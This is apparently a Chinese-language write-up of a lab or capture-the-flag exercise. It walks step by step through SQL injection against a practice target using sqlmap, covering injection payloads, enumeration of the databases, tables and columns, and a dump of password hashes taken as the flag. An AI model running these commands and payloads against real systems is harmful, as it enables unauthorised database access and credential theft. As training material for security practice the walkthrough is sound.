Dont be a SQL boy. Let's be a hacker. 记录一次 sql 注入

SQL注入

靶机:http://219.153.49.228:42101/

第一步: 判断是否为注入点

1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2

结果出来了,果然有漏洞:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1729=1729

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 4966 FROM (SELECT(SLEEP(5)))Skub)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-4567 UNION ALL SELECT NULL,NULL,CONCAT(0x7171767071,0x6e4d6358704a4767585255695747714242575366494e7a6563626f6b4572684650674676766d554f,0x716b787671),NULL-- -
---


然后,获取数据库:
1
python sqlmap.py -u "http://219.153.49.228:42101/" --dbs

1
2
3
4
5
6
available databases [5]:
[*] information_schema
[*] mozhe_Discuz_StormGroup
[*] mysql
[*] performance_schema
[*] sys

接下来就是拖库操作了
第三步,查看当前程序所用的数据库

1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2 --current-db

1
2
3
4
[22:29:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[22:29:54] [INFO] fetching current database
current database: 'mozhe_Discuz_StormGroup'

再看一下当前用户:
1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2 --current-user

1
2
[22:36:41] [INFO] fetching current user
current user: 'root@localhost'

第四步, 列出指定数据库的所有表,-D来指定数据表:
1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2 --tables -D "mozhe_Discuz_StormGroup"

1
2
3
4
5
6
Database: mozhe_Discuz_StormGroup
[2 tables]
+-------------------+
| StormGroup_member |
| notice            |
+-------------------+

第五步,读取表中的字段名称:
1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2 --tables -D mozhe_Discuz_StormGroup -T StormGroup_member --columns

1
2
3
4
5
6
7
8
9
10
11
Database: mozhe_Discuz_StormGroup
Table: StormGroup_member
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| name     | varchar(20)  |
| password | varchar(255) |
| status   | int(11)      |
+----------+--------------+

可以看到password就是我们想要的东西,最后来查询它:
1
python sqlmap.py -u "http://219.153.49.228:42101/" --forms --crawl=2 -D mozhe_Discuz_StormGroup --tables -C password --dump

flag就被拿到了:
1
2
3
4
5
6
7
8
9
Database: mozhe_Discuz_StormGroup
Table: StormGroup_member
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 356f589a7df439f6f744ff19bb8092c0 |
| b39fe7ddfdd7f0a66af7c1da837f210b |
+----------------------------------+